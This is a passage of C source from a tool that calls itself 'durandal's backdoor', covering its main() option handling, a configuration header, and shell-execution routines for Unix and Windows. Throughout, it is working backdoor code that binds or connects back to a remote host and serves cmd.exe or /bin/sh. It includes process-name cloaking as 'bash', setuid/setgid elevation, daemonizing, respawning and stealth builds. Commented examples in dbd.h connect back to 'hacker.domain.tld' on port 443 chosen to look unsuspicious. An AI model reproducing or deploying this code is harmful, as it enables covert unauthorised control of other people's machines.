| #endif 271 | 272 | 273 | /******** main() ********/ 274 | 275 | #if defined WIN32 && defined WINMAIN 276 | int PASCAL WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { 277 | #else 278 | int main(int argc, char **argv) { 279 | #endif 280 | int i; 281 | int used_p = 0; 282 | 283 | /* code starts */ 284 | 285 | #if defined WIN32 && defined WINMAIN 286 | /* parse the command line */ 287 | ParseCommandLine(lpCmd); 288 | #endif 289 | if(cloak) 290 | { 291 | #ifdef WIN32 292 | //stub 293 | #else 294 | //change argv[0] to say bash 295 | int scrub; 296 | strncpy((char *)argv[0], "\0", strlen((char *)argv[0]) + 1); 297 | strcpy((char *)argv[0], "bash\0"); 298 | for (scrub = 1; scrub < argc; scrub++) 299 | { 300 | strncpy((char *)argv[scrub], "\0", strlen((char *)argv[scrub]) + 1); 301 | } 302 | #endif 303 | } 304 | 305 | while ((i = getopt(argc, argv, "hlp:a:e:r:c:k:qvnmsw:P:H:VD:X:1:")) != -1) { 306 | switch(i) { 307 | case 'l': 308 | do_listen = 1; 309 | break; 310 | case 'p': 311 | used_p = 1; 312 | port = atoi(optarg); 313 | if ((port < 1) || (port > 65535)) { 314 | #ifndef WINMAIN 315 | if (!quiet) 316 | fprintf(stderr, "port must be within 1-65535\n"); 317 | #else 318 | #ifndef STEALTH 319 | if (!quiet) 320 | errbox("port must be within 1-65535"); 321 | #endif 322 | #endif 323 | return 1; 324 | } 325 | break; 326 | case 'a': 327 | bind_to_address = strdup(optarg); 328 | break; 329 | case 'e': 330 | program_to_execute = strdup(optarg); 331 | if (!program_to_execute) { 332 | #ifndef WINMAIN 333 | if (!quiet) 334 | fprintf(stderr, "strdup(): %s\n", strerror(errno)); 335 | #else 336 | #ifndef STEALTH 337 | if (!quiet) 338 | errbox("strdup() failed!"); 339 | #endif 340 | #endif 341 | return 1; 342 | } 343 | memset(optarg, 0x20, strlen(optarg)); 344 | break; 345 | case 'r': 346 | respawn_interval = atoi(optarg); 347 | respawn_enabled = 1; 348 | break; 349 | case 'c': 350 | if (!strcasecmp(optarg, "on")) { 351 | use_encryption = 1; 352 | } else if (!strcasecmp(optarg, "off")) { 353 | use_encryption = 0; 354 | } else { 355 | #ifndef WINMAIN 356 | if (!quiet) 357 | fprintf(stderr, "-c can only be \"on\" or \"off\"\n"); 358 | #else 359 | #ifndef STEALTH 360 | if (!quiet) 361 | errbox("-c can only be \"on\" or \"off\""); 362 | #endif 363 | #endif 364 | return 1; 365 | } 366 | break; 367 | case 'k': 368 | aes_secret = strdup(optarg); 369 | /* swab out the passphrase from argv (tested under glibc 370 | 2.2.5, and NetBSD libc.so.12) 371 | */ 372 | memset(optarg, 0x20, strlen(optarg)); 373 | break; 374 | case 'q': 375 | if (quiet) { 376 | quiet = 0; 377 | } else { 378 | quiet = 1; 379 | } 380 | break; 381 | case 'v': 382 | verbose++; 383 | break; 384 | case 'n': 385 | if (use_dns) { 386 | use_dns = 0; 387 | } else { 388 | use_dns = 1; 389 | } 390 | break; 391 | case 'm': 392 | if (snooping) { 393 | snooping = 0; 394 | } else { 395 | snooping = 1; 396 | } 397 | break; 398 | #ifndef WIN32 399 | case 's': 400 | if (invokeshell) { 401 | invokeshell = 0; 402 | } else { 403 | invokeshell = 1; 404 | } 405 | break; 406 | case 'w': 407 | immobility_timeout = atoi(optarg); 408 | break; 409 | #endif 410 | case 'P': 411 | prefix_outgoing_with = strdup(optarg); 412 | memset(optarg, 0x20, strlen(optarg)); 413 | break; 414 | case 'H': 415 | if (!strcasecmp(optarg, "on")) { 416 | highlight_incoming = 1; 417 | } else if (!strcasecmp(optarg, "off")) { 418 | highlight_incoming = 0; 419 | } else { 420 | #ifndef WINMAIN 421 | if (!quiet) 422 | fprintf(stderr, "-H can only be \"on\" or \"off\"\n"); 423 | #else 424 | #ifndef STEALTH 425 | if (!quiet) 426 | errbox("-H can only be \"on\" or \"off\""); 427 | #endif 428 | #endif 429 | return 1; 430 | } 431 | break; 432 | case 'V': 433 | #ifndef WINMAIN 434 | print_version(); 435 | #else 436 | #ifndef STEALTH 437 | verbox(); 438 | #endif 439 | #endif 440 | return 2; 441 | case 'D': 442 | if (!strcasecmp(optarg, "on")) { 443 | daemonize = 1; 444 | } else if (!strcasecmp(optarg, "off")) { 445 | daemonize = 0; 446 | } else { 447 | #ifndef WINMAIN 448 | if (!quiet) 449 | fprintf(stderr, "-D can only be \"on\" or \"off\"\n"); 450 | #else 451 | #ifndef STEALTH 452 | if (!quiet) 453 | errbox("-D can only be \"on\" or \"off\""); 454 | #endif 455 | #endif 456 | return 1; 457 | } 458 | break; 459 | #ifdef WIN32 460 | /* windows options */ 461 | case 'X': 462 | if (!strcasecmp(optarg, "on")) { 463 | convert_to_crlf = 1; 464 | } else if (!strcasecmp(optarg, "off")) { 465 | convert_to_crlf = 0; 466 | } else { 467 | #ifndef WINMAIN 468 | if (!quiet) 469 | fprintf(stderr, "-X can only be \"on\" or \"off\"\n"); 470 | #else 471 | #ifndef STEALTH 472 | if (!quiet) 473 | errbox("-X can only be \"on\" or \"off\""); 474 | #endif 475 | #endif 476 | return 1; 477 | } 478 | break; 479 | case '1': 480 | if (!strcasecmp(optarg, "on")) { 481 | only_one_instance = 1; 482 | } else if (!strcasecmp(optarg, "off")) { 483 | only_one_instance = 0; 484 | } else { 485 | #ifndef WINMAIN 486 | if (!quiet) 487 | fprintf(stderr, "-1 can only be \"on\" or \"off\"\n"); 488 | #else 489 | #ifndef STEALTH 490 | if (!quiet) 491 | errbox("-1 can only be \"on\" or \"off\""); 492 | #endif 493 | #endif 494 | return 1; 495 | } 496 | break; 497 | #else 498 | /* unix options */ 499 | case 'X': 500 | case '1': 501 | if (!quiet) 502 | fprintf(stderr, "-%c is only implemented on Win32\n", i); 503 | return 1; 504 | #endif 505 | 506 | /* back to win32 _and_ unix options */ 507 | 508 | case '?': 509 | #ifdef WINMAIN 510 | #ifndef STEALTH 511 | errbox("syntax error (-h for help)"); 512 | #endif 513 | #endif 514 | return 1; 515 | default: 516 | #ifndef WINMAIN 517 | usage(); 518 | #else 519 | #ifndef STEALTH 520 | message_box_usage(); 521 | #endif 522 | #endif 523 | return 1; 524 | } 525 | } 526 | 527 | 528 | /* quiet means _quiet!_ */ 529 | if (quiet) { 530 | verbose = 0; 531 | } else { 532 | /* turn on snooping if -vv (-v -v) was specified */ 533 | if (verbose > 1) { 534 | snooping = 1; 535 | } 536 | } 537 | 538 | #ifdef WIN32 539 | if (only_one_instance) { 540 | dbd_semhandle = CreateSemaphore(NULL, 1, 1, dbd_semaphore); 541 | if (WaitForSingleObject(dbd_semhandle, 0) == WAIT_TIMEOUT) { 542 | #ifndef WINMAIN 543 | if (!quiet) 544 | fprintf(stderr, "dbd is already running, use -1off to override!\n"); 545 | #else 546 | #ifndef STEALTH 547 | if (!quiet) 548 | infobox("dbd is already running, use -1off to override!"); 549 | #endif 550 | #endif 551 | CloseHandle(dbd_semhandle); 552 | return 1; 553 | } 554 | atexit(dbd_release_semaphore); 555 | } 556 | 557 | #ifndef WINMAIN 558 | if (daemonize) { 559 | /* daemonize means we wanna be quiet aswell */ 560 | quiet = 1; 561 | verbose = 0; 562 | 563 | FreeConsole(); 564 | } 565 | #else 566 | /* we turn on quiet mode if -Don has been specified when we're running 567 | * as a WinMain app! 568 | */ 569 | if (daemonize) { 570 | quiet = 1; 571 | verbose = 0; 572 | } 573 | #endif 574 | 575 | 576 | #else 577 | 578 | /* for unix-like OSes... */ 579 | 580 | /* if the setuid and/or setgid bit is set on dbd, set effective uid and/or gid */ 581 | 582 | if (getuid() != geteuid()) { 583 | if (setuid(geteuid())) { 584 | fprintf(stderr, "setuid(geteuid()): %s\n", strerror(errno)); 585 | } 586 | } 587 | if (getuid() == 0) { /* if we're already root, set gid == 0 */ 588 | if (setgid(0)) { 589 | fprintf(stderr, "setgid(0): %s\n", strerror(errno)); 590 | } 591 | } else { 592 | if (getgid() != geteuid()) { 593 | if (setgid(getegid())) { 594 | fprintf(stderr, "setgid(getegid()): %s\n", strerror(errno)); 595 | } 596 | } 597 | } 598 | 599 | 600 | if (invokeshell) { /* if invokeshell is set, we only invoke a shell (/bin/sh) */ 601 | fprintf(stderr, "invoking shell\n"); 602 | fflush(stderr); 603 | execlp("/bin/sh", "sh", (char *)NULL); 604 | fprintf(stderr, "execlp() failed: %s\n", strerror(errno)); 605 | return 1; 606 | } 607 | 608 | 609 | /* we fork() right here, if that's what we want to do */ 610 | if (daemonize) { 611 | int pid; 612 | int nullfd; 613 | 614 | /* daemonize means we wanna be quiet aswell */ 615 | quiet = 1; 616 | verbose = 0; 617 | 618 | pid = fork(); 619 | if (pid > 0) { 620 | /* the parent exits */ 621 | return 0; 622 | } else if (pid < 0) { 623 | perror("fork()"); 624 | return 1; 625 | } 626 | 627 | /* the child continues... */ 628 | 629 | /* redirect stdin, stdout and stderr to /dev/null */ 630 | if ((nullfd = open("/dev/null", O_RDWR)) >= 0) { 631 | dup2(nullfd, STDIN_FILENO); 632 | close(nullfd); 633 | dup2(STDIN_FILENO, STDOUT_FILENO); 634 | dup2(STDIN_FILENO, STDERR_FILENO); 635 | } 636 | } 637 | 638 | #endif 639 | 640 | 641 | #if defined WIN32 && defined WINMAIN 642 | /* remove the hour glass */ 643 | 644 | /* IsWinNT() and code below derived from "The Insider": 645 | * The Insider V1.0 -- Win32 reverse backdoor 646 | * nick102799@hotmail.com , Jul 21 2003 647 | */ 648 | /* Get rid of the startup hourglass XXXXXXXXXXX win 9x ????? */ 649 | if (IsWinNT()) { 650 | int c; 651 | MSG msg; 652 | while (1) { 653 | c = PostThreadMessage(GetCurrentThreadId(), WM_NULL, 0, 0); 654 | if (c != 0) { 655 | GetMessage(&msg, NULL, 0, 0); 656 | break; 657 | } 658 | Sleep(100); 659 | } 660 | } 661 | #endif 662 | 663 | 664 | if (do_listen) { 665 | /* see if we're gonna listen() */ 666 | if (!port) { 667 | #ifndef WINMAIN 668 | if (!quiet) 669 | fprintf(stderr, "you must specify a port to listen to with -p port\n"); 670 | #else 671 | #ifndef STEALTH 672 | if (!quiet) 673 | errbox("you must specify a port to listen to with -p port"); 674 | #endif 675 | #endif 676 | return 1; 677 | } 678 | 679 | if (respawn_enabled) { 680 | while (1) { 681 | if (dbd_listen(port, bind_to_address) == 1) { 682 | return 1; 683 | } 684 | #ifndef WINMAIN 685 | if (verbose && (respawn_interval > 1)) { 686 | fprintf(stderr, "sleeping for %u seconds until re-listening\n", respawn_interval); 687 | } 688 | #endif 689 | 690 | #ifdef WIN32 691 | Sleep(respawn_interval * 1000); 692 | #else 693 | sleep(respawn_interval); 694 | #endif 695 | } 696 | } else { 697 | dbd_listen(port, bind_to_address); 698 | } 699 | 700 | } else { 701 | /* else we connect() */ 702 | 703 | /* if -p was used with connect, we use -p port as our source port */ 704 | if (used_p) { 705 | sport = port; 706 | } 707 | 708 | if (optind < argc) { 709 | host = strdup(argv[optind]); 710 | memset(argv[optind], 0x20, strlen(argv[optind])); 711 | optind++; 712 | if (optind < argc) { 713 | port = atoi(argv[optind]); 714 | memset(argv[optind], 0x20, strlen(argv[optind])); 715 | } 716 | } 717 | 718 | if (!host) { 719 | #ifndef WINMAIN 720 | if (!quiet) 721 | fprintf(stderr, "no host to connect to (-h for help)\n"); 722 | #else 723 | #ifndef STEALTH 724 | if (!quiet) 725 | errbox("no host to connect to (-h for help)"); 726 | #endif 727 | #endif 728 | return 1; 729 | } 730 | 731 | if (!port) { 732 | #ifndef WINMAIN 733 | if (!quiet) 734 | fprintf(stderr, "no port to connect to (-h for help)\n"); 735 | #else 736 | #ifndef STEALTH 737 | if (!quiet) 738 | errbox("no port to connect to (-h for help)"); 739 | #endif 740 | #endif 741 | return 1; 742 | } 743 | 744 | if (respawn_enabled) { 745 | if (respawn_interval < 1) 746 | respawn_interval = 1; 747 | 748 | while (1) { 749 | if (dbd_connect(host, port, sport, bind_to_address) == 1) { 750 | return 1; 751 | } 752 | #ifndef WINMAIN 753 | if (verbose && (respawn_interval > 1)) { 754 | fprintf(stderr, "sleeping for %u seconds until reconnecting\n", respawn_interval); 755 | } 756 | #endif 757 | 758 | #ifdef WIN32 759 | Sleep(respawn_interval * 1000); 760 | #else 761 | sleep(respawn_interval); 762 | #endif 763 | } 764 | } else { 765 | dbd_connect(host, port, sport, bind_to_address); 766 | } 767 | } 768 | 769 | return 0; 770 | } 771 | 772 | -------------------------------------------------------------------------------- /dbd.h: -------------------------------------------------------------------------------- 1 | /* this file is used to hardcode a behaviour into dbd. 2 | * to use this feature, uncomment one of the examples below, 3 | * or type in your own. when finished, recompile dbd. 4 | */ 5 | 6 | /* these are the default values, change to suite your taste */ 7 | 8 | #define HOST NULL 9 | #define BINDHOST NULL 10 | #define PORT 0 11 | #define SOURCE_PORT 0 12 | #define DOLISTEN 0 13 | #define EXECPROG NULL 14 | #define CONVERT_TO_CRLF 0 15 | #define ENCRYPTION 1 16 | #define SHARED_SECRET "lulzsecpwnsj00" 17 | #define RESPAWN_ENABLED 0 18 | #define RESPAWN_INTERVAL 0 19 | #define QUIET 0 20 | #define VERBOSE 0 21 | #define DAEMONIZE 0 22 | 23 | /* Romulan Cloaking Technology - MUST DEFINE ALL OPTIONS IN THIS HEADER 24 | * When set to 1, this option will change argv[0] (and therefore the process's 25 | * entry in ps, netstat, etc) to "bash" 26 | * WARNING: Will remove other command-line variables, so only use it when hard 27 | * coding all variables into this header. 28 | */ 29 | #define CLOAK 0 30 | 31 | /* "chat" options */ 32 | 33 | #define HIGHLIGHT_INCOMING 0 34 | #define HIGHLIGHT_PREFIX "\x1b[0;32m" 35 | #define HIGHLIGHT_SUFFIX "\x1b[0m" 36 | #define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": " 37 | 38 | /* win32 specific options: */ 39 | 40 | #define RUN_ONLY_ONE_INSTANCE 0 41 | #define INSTANCE_SEMAPHORE "durandal_bd_semaphore" 42 | 43 | 44 | /* some examples: */ 45 | 46 | /* listen for incoming connection on port 1234, serve "cmd.exe" to the 47 | * connecting party. when disconnected, dbd will immediately re-bind the port 48 | * and listen for another connection... 49 | */ 50 | /* 51 | #define DOLISTEN 1 52 | #define PORT 1234 53 | #define RESPAWN_ENABLED 1 54 | #define EXECPROG "cmd.exe" 55 | */ 56 | 57 | /* connect to hacker.domain.tld on port 443 and serve "cmd.exe". we hardcode 58 | * "something else" into dbd as our aes-128 encryption pass phrase (encryption 59 | * is on per default in dbd). we use port 443 (https) since https traffic is 60 | * encrypted, which means our activity won't be that suspicious. DAEMONIZE 1 61 | * means that we're going to detach from the console (under win32). 62 | */ 63 | /* 64 | #define DOLISTEN 0 65 | #define HOST "hacker.domain.tld" 66 | #define PORT 443 67 | #define RESPAWN_ENABLED 1 68 | #define RESPAWN_INTERVAL 1800 69 | #define EXECPROG "cmd.exe" 70 | #define SHARED_SECRET "something else" 71 | #define DAEMONIZE 1 72 | */ 73 | 74 | /* connect to hacker.domain.tld on port 993 (imaps) and serve /bin/sh. 75 | * reconnect every 2 hours. 76 | */ 77 | /* 78 | #define DOLISTEN 0 79 | #define HOST "hacker.domain.tld" 80 | #define PORT 993 81 | #define RESPAWN_ENABLED 1 82 | #define RESPAWN_INTERVAL 7200 83 | #define EXECPROG "/bin/sh" 84 | */ 85 | 86 | -------------------------------------------------------------------------------- /doexec.c: -------------------------------------------------------------------------------- 1 | #ifdef WIN32 2 | #include "doexec_win32.h" 3 | #else 4 | #include "doexec_unix.h" 5 | #endif 6 | -------------------------------------------------------------------------------- /doexec_unix.h: -------------------------------------------------------------------------------- 1 | /* 2 | * dbd - durandal's backdoor 3 | * Copyright (C) 2013 Kyle Barnthouse 4 | * 5 | * This program is free software; you can redistribute it and/or modify it 6 | * under the terms of the GNU General Public License as published by the Free 7 | * Software Foundation; either version 2 of the License, or (at your option) 8 | * any later version. 9 | * 10 | * This program is distributed in the hope that it will be useful, but WITHOUT 11 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 12 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 13 | * more details. 14 | * 15 | * You should have received a copy of the GNU General Public License along 16 | * with this program; if not, write to the Free Software Foundation, Inc., 59 17 | * Temple Place, Suite 330, Boston, MA 02111-1307 USA 18 | * 19 | * See the COPYING file for more information. 20 | */ 21 | 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | 33 | #include "pel.h" 34 | 35 | extern int errno; 36 | 37 | extern char *program_to_execute; 38 | extern int respawn_enabled; 39 | extern int use_encryption; 40 | extern int quiet; 41 | extern int snooping; 42 | extern int immobility_timeout; 43 | 44 | extern int highlight_incoming; 45 | extern char highlight_prefix[]; 46 | extern char highlight_suffix[]; 47 | 48 | /* 49 | this doexec() handles execution for dbd on Unix-like operating systems. 50 | there are really 3 implementations: 1) if encryption is used, a parent 51 | process is handling encryption/decryption for the child, pipes are used 52 | for communication between the running program's process and the polling 53 | parent process. 2) if respawning/reconnection has been enabled, the 54 | process simply runs the app in a fork()ed process. 3) if 55 | respawning/reconnection is not enabled, the app to execute takes over the 56 | process (stdin, stdout, stderr is the peer socket). 57 | */ 58 | 59 | int doexec(int socketfd) { 60 | char buf[BUFSIZE]; 61 | register char *p; 62 | 63 | int read_pipe[2]; 64 | int write_pipe[2]; 65 | int readfd, writefd; 66 | int writefdflags; 67 | int pid; 68 | 69 | if (!program_to_execute) { 70 | if (!quiet) 71 | fprintf(stderr, "no program to execute\n"); 72 | close(socketfd); 73 | return 1; 74 | } 75 | 76 | /* we do the same that netcat is doing :) */ 77 | p = strrchr(program_to_execute, '/'); 78 | if (p) { 79 | p++; 80 | } else { 81 | p = program_to_execute; 82 | } 83 | 84 | /* piping starts */ 85 | 86 | if (pipe(read_pipe)) { 87 | if (!quiet) 88 | perror("pipe()"); 89 | close(socketfd); 90 | return 1; 91 | } 92 | if (pipe(write_pipe)) { 93 | if (!quiet) 94 | perror("pipe()"); 95 | close(read_pipe[0]); 96 | close(read_pipe[1]); 97 | close(socketfd); 98 | return 1; 99 | } 100 | 101 | readfd = read_pipe[0]; 102 | writefd = write_pipe[1]; 103 | 104 | /* set non-blocking IO on writefd, otherwise it's possible write() will hang infinitely */ 105 | writefdflags = fcntl(writefd, F_GETFL, 0); 106 | fcntl(writefd, F_SETFL, writefdflags | O_NONBLOCK); 107 | 108 | 109 | pid = fork(); 110 | 111 | if (pid == 0) { 112 | /* child */ 113 | 114 | /* will cause problems if the child has the socket too */ 115 | close(socketfd); 116 | 117 | dup2(write_pipe[0], STDIN_FILENO); 118 | dup2(read_pipe[1], STDOUT_FILENO); 119 | dup2(STDOUT_FILENO, STDERR_FILENO); 120 | 121 | /* if we don't close all of 'em, the select() loop below (in the 122 | * parent's process) will behave very badly. 123 | */ 124 | close(read_pipe[0]); 125 | close(read_pipe[1]); 126 | close(write_pipe[0]); 127 | close(write_pipe[1]); 128 | 129 | execlp(program_to_execute, p, (char *)NULL); 130 | if (!quiet) 131 | perror(program_to_execute); 132 | exit(1); 133 | } else if (pid > 0) { 134 | /* parent */ 135 | 136 | /* we can't use these (child process'), select() will not like 137 | * that they are open */ 138 | close(read_pipe[1]); 139 | close(write_pipe[0]); 140 | 141 | while (1) { 142 | fd_set fds; 143 | struct timeval to1; 144 | int sel; 145 | 146 | FD_ZERO(&fds); 147 | FD_SET(socketfd, &fds); 148 | FD_SET(readfd, &fds); 149 | 150 | if (immobility_timeout > 0) { 151 | to1.tv_sec = immobility_timeout; 152 | to1.tv_usec = 0; 153 | sel = select(FD_SETSIZE, &fds, NULL, NULL, &to1); 154 | } else { 155 | sel = select(FD_SETSIZE, &fds, NULL, NULL, NULL); 156 | } 157 | 158 | if (sel > 0) { 159 | int cnt; 160 | if (FD_ISSET(socketfd, &fds)) { 161 | if (use_encryption) { 162 | /* pel_recv_msg() will modify cnt */ 163 | cnt = sizeof(buf); 164 | if (pel_recv_msg(socketfd, buf, &cnt) != PEL_SUCCESS) { 165 | break; 166 | } 167 | } else { 168 | if ((cnt = recv(socketfd, buf, sizeof(buf), 0)) < 1) { 169 | if ((cnt < 0) && (errno == EWOULDBLOCK || errno == EAGAIN)) { 170 | continue; 171 | } else { 172 | break; 173 | } 174 | } 175 | } 176 | if (snooping) { 177 | if (highlight_incoming) { 178 | write(STDOUT_FILENO, highlight_prefix, strlen(highlight_prefix)); 179 | write(STDOUT_FILENO, buf, cnt); 180 | write(STDOUT_FILENO, highlight_suffix, strlen(highlight_suffix)); 181 | } else { 182 | write(STDOUT_FILENO, buf, cnt); 183 | } 184 | } 185 | write(writefd, buf, cnt); 186 | } 187 | if (FD_ISSET(readfd, &fds)) { 188 | if ((cnt = read(readfd, buf, sizeof(buf))) < 1) { 189 | if ((cnt < 0) && (errno == EWOULDBLOCK || errno == EAGAIN)) { 190 | continue; 191 | } else { 192 | break; 193 | } 194 | } 195 | if (snooping) { 196 | write(STDOUT_FILENO, buf, cnt); 197 | } 198 | if (use_encryption) { 199 | if (pel_send_msg(socketfd, buf, cnt) != PEL_SUCCESS) { 200 | break; 201 | } 202 | } else { 203 | send(socketfd, buf, cnt, 0); 204 | } 205 | } 206 | } else { 207 | if (sel < 0) 208 | perror("select()"); 209 | break; 210 | } 211 | } 212 | /* close pipes and socket */ 213 | close(readfd); 214 | close(writefd); 215 | close(socketfd); 216 | /* then wait for the child to exit */ 217 | wait(NULL); 218 | } else { 219 | if (!quiet) 220 | perror("fork()"); 221 | /* close pipes and socket */ 222 | close(read_pipe[0]); 223 | close(read_pipe[1]); 224 | close(write_pipe[0]); 225 | close(write_pipe[1]); 226 | close(socketfd); 227 | return 1; 228 | } 229 | 230 | return 0; 231 | } 232 | -------------------------------------------------------------------------------- /doexec_win32.h: -------------------------------------------------------------------------------- 1 | /* 2 | doexec.c was derived from the Win32 port of Netcat and has been slightly 3 | modified for dbd (2 potentially harmful buffer overflows and a memory leak 4 | has been resolved in the process). 5 | 6 | The original version of Netcat was written by *hobbit* 7 | The NT version was done by Weld Pond 8 | */ 9 | 10 | // portions Copyright (C) 1994 Nathaniel W. Mishkin 11 | // code taken from rlogind.exe 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | 19 | #include "pel.h" 20 | 21 | #define BUFFER_SIZE BUFSIZE 22 | 23 | extern char *program_to_execute; 24 | extern int use_encryption; 25 | extern int quiet; 26 | extern int convert_to_crlf; 27 | 28 | #ifndef WINMAIN 29 | extern int snooping; 30 | extern int highlight_incoming; 31 | extern char highlight_prefix[]; 32 | extern char highlight_suffix[]; 33 | #endif 34 | 35 | #ifdef WINMAIN 36 | #ifndef STEALTH 37 | extern void errbox(char *msg); 38 | void displayAmbitiousErrbox(char *prefix, DWORD err); 39 | #endif 40 | #endif 41 | 42 | char smbuff[20]; 43 | 44 | // 45 | // Structure used to describe each session 46 | // 47 | typedef struct { 48 | 49 | // 50 | // These fields are filled in at session creation time 51 | // 52 | HANDLE ReadPipeHandle; // Handle to shell stdout pipe 53 | HANDLE WritePipeHandle; // Handle to shell stdin pipe 54 | HANDLE ProcessHandle; // Handle to shell process 55 | 56 | // 57 | // 58 | // These fields are filled in at session connect time and are only 59 | // valid when the session is connected 60 | // 61 | SOCKET ClientSocket; 62 | HANDLE ReadShellThreadHandle; // Handle to session shell-read thread 63 | HANDLE WriteShellThreadHandle; // Handle to session shell-read thread 64 | 65 | int QuitAllThreads; 66 | 67 | } SESSION_DATA, *PSESSION_DATA; 68 | 69 | 70 | // 71 | // Private prototypes 72 | // 73 | 74 | static HANDLE 75 | StartShell( 76 | HANDLE StdinPipeHandle, 77 | HANDLE StdoutPipeHandle 78 | ); 79 | 80 | static VOID 81 | SessionReadShellThreadFn( 82 | LPVOID Parameter 83 | ); 84 | 85 | static VOID 86 | SessionWriteShellThreadFn( 87 | LPVOID Parameter 88 | ); 89 | 90 | 91 | 92 | // ********************************************************************** 93 | // 94 | // CreateSession 95 | // 96 | // Creates a new session. Involves creating the shell process and establishing 97 | // pipes for communication with it. 98 | // 99 | // Returns a handle to the session or NULL on failure. 100 | // 101 | 102 | static PSESSION_DATA 103 | CreateSession( 104 | VOID 105 | ) 106 | { 107 | PSESSION_DATA Session = NULL; 108 | BOOL Result; 109 | SECURITY_ATTRIBUTES SecurityAttributes; 110 | HANDLE ShellStdinPipe = NULL; 111 | HANDLE ShellStdoutPipe = NULL; 112 | 113 | // 114 | // Allocate space for the session data 115 | // 116 | Session = (PSESSION_DATA) malloc(sizeof(SESSION_DATA)); 117 | if (Session == NULL) { 118 | return(NULL); 119 | } 120 | 121 | // 122 | // Reset fields in preparation for failure 123 | // 124 | Session->ReadPipeHandle = NULL; 125 | Session->WritePipeHandle = NULL; 126 | 127 | /* QuitAllThreads is how we sync between threads 128 | -- */ 129 | Session->QuitAllThreads = 0; 130 | 131 | 132 | // 133 | // Create the I/O pipes for the shell 134 | // 135 | SecurityAttributes.nLength = sizeof(SecurityAttributes); 136 | SecurityAttributes.lpSecurityDescriptor = NULL; // Use default ACL 137 | SecurityAttributes.bInheritHandle = TRUE; // Shell will inherit handles 138 | 139 | Result = CreatePipe(&Session->ReadPipeHandle, &ShellStdoutPipe, 140 | &SecurityAttributes, 0); 141 | if (!Result) { 142 | #ifndef WINMAIN 143 | if (!quiet) 144 | fprintf(stderr, "failed to create shell stdout pipe (net helpmsg %s)\n", itoa(GetLastError(), smbuff, 10)); 145 | #else 146 | #ifndef STEALTH 147 | if (!quiet) 148 | displayAmbitiousErrbox("failed to create shell stdout pipe!\n", GetLastError()); 149 | #endif 150 | #endif 151 | goto Failure; 152 | } 153 | Result = CreatePipe(&ShellStdinPipe, &Session->WritePipeHandle, 154 | &SecurityAttributes, 0); 155 | 156 | if (!Result) { 157 | #ifndef WINMAIN 158 | if (!quiet) 159 | fprintf(stderr, "failed to create shell stdin pipe (net helpmsg %s)\n", itoa(GetLastError(), smbuff, 10)); 160 | #else 161 | #ifndef STEALTH 162 | if (!quiet) 163 | displayAmbitiousErrbox("failed to create shell stdin pipe!\n", GetLastError()); 164 | #endif 165 | #endif 166 | goto Failure; 167 | } 168 | // 169 | // Start the shell 170 | // 171 | Session->ProcessHandle = StartShell(ShellStdinPipe, ShellStdoutPipe); 172 | 173 | // 174 | // We're finished with our copy of the shell pipe handles 175 | // Closing the runtime handles will close the pipe handles for us. 176 | // 177 | CloseHandle(ShellStdinPipe); 178 | CloseHandle(ShellStdoutPipe); 179 | 180 | // 181 | // Check result of shell start 182 | // 183 | if (Session->ProcessHandle == NULL) { 184 | goto Failure; 185 | } 186 | 187 | // 188 | // The session is not connected, initialize variables to indicate that 189 | // 190 | Session->ClientSocket = INVALID_SOCKET; 191 | 192 | // 193 | // Success, return the session pointer as a handle 194 | // 195 | return(Session); 196 | 197 | Failure: 198 | 199 | // 200 | // We get here for any failure case. 201 | // Free up any resources and exit 202 | // 203 | 204 | if (ShellStdinPipe != NULL) 205 | CloseHandle(ShellStdinPipe); 206 | if (ShellStdoutPipe != NULL) 207 | CloseHandle(ShellStdoutPipe); 208 | if (Session->ReadPipeHandle != NULL) 209 | CloseHandle(Session->ReadPipeHandle); 210 | if (Session->WritePipeHandle != NULL) 211 | CloseHandle(Session->WritePipeHandle); 212 | 213 | free(Session); 214 | 215 | return(NULL); 216 | } 217 | 218 | 219 | 220 | BOOL 221 | doexec( 222 | SOCKET ClientSocket 223 | ) 224 | { 225 | PSESSION_DATA Session = CreateSession(); 226 | SECURITY_ATTRIBUTES SecurityAttributes; 227 | DWORD ThreadId; 228 | HANDLE HandleArray[3]; 229 | int i; 230 | 231 | if (!program_to_execute) { 232 | #ifndef WINMAIN 233 | if (!quiet) 234 | fprintf(stderr, "no program to execute\n"); 235 | #else 236 | #ifndef STEALTH 237 | if (!quiet) 238 | errbox("no program to execute!"); 239 | #endif 240 | #endif 241 | return FALSE; 242 | } 243 | 244 | SecurityAttributes.nLength = sizeof(SecurityAttributes); 245 | SecurityAttributes.lpSecurityDescriptor = NULL; // Use default ACL 246 | SecurityAttributes.bInheritHandle = FALSE; // No inheritance 247 | 248 | // 249 | // Store the client socket handle in the session structure so the thread 250 | // can get at it. This also signals that the session is connected. 251 | // 252 | Session->ClientSocket = ClientSocket; 253 | 254 | // 255 | // Create the session threads 256 | // 257 | Session->ReadShellThreadHandle = 258 | CreateThread(&SecurityAttributes, 0, 259 | (LPTHREAD_START_ROUTINE) SessionReadShellThreadFn, 260 | (LPVOID) Session, 0, &ThreadId); 261 | 262 | if (Session->ReadShellThreadHandle == NULL) { 263 | #ifndef WINMAIN 264 | if (!quiet) 265 | fprintf(stderr, "failed to create ReadShell session thread (net helpmsg %s)\n", itoa(GetLastError(), smbuff, 10)); 266 | #else 267 | #ifndef STEALTH 268 | if (!quiet) 269 | displayAmbitiousErrbox("failed to create ReadShell session thread!\n", GetLastError()); 270 | #endif 271 | #endif 272 | // 273 | // Reset the client pipe handle to indicate this session is disconnected 274 | // 275 | Session->ClientSocket = INVALID_SOCKET; 276 | return(FALSE); 277 | } 278 | 279 | Session->WriteShellThreadHandle = 280 | CreateThread(&SecurityAttributes, 0, 281 | (LPTHREAD_START_ROUTINE) SessionWriteShellThreadFn, 282 | (LPVOID) Session, 0, &ThreadId); 283 | 284 | if (Session->WriteShellThreadHandle == NULL) { 285 | #ifndef WINMAIN 286 | if (!quiet) 287 | fprintf(stderr, "failed to create ReadShell session thread (net helpmsg %s)\n", itoa(GetLastError(), smbuff, 10)); 288 | #else 289 | #ifndef STEALTH 290 | if (!quiet) 291 | displayAmbitiousErrbox("failed to create ReadShell session thread!\n", GetLastError()); 292 | #endif 293 | #endif 294 | // 295 | // Reset the client pipe handle to indicate this session is disconnected 296 | // 